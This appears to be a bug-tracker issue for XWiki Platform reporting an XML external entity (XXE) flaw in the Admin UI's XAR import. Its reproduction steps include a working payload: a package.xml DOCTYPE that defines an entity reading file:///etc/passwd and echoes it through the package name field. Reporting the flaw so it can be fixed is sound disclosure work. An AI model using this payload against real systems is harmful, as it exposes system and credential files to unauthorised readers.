Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20320

XXE attack on the import XAR Admin UI

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      To reproduce:

      • Create a XAR package and modify the package.xml's like this:
        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
        
        <package>
        <infos>
        <name>&xxe;</name>
        <description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
        <licence></licence>
        <author>XWiki.Admin</author>
        ...
        
      • Go to the Admin UI > Import
      • Notice that this allows you to see the content of /etc/passwd

      Attachments

        Issue Links

          Activity

            People

              vmassol Vincent Massol
              vmassol Vincent Massol
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: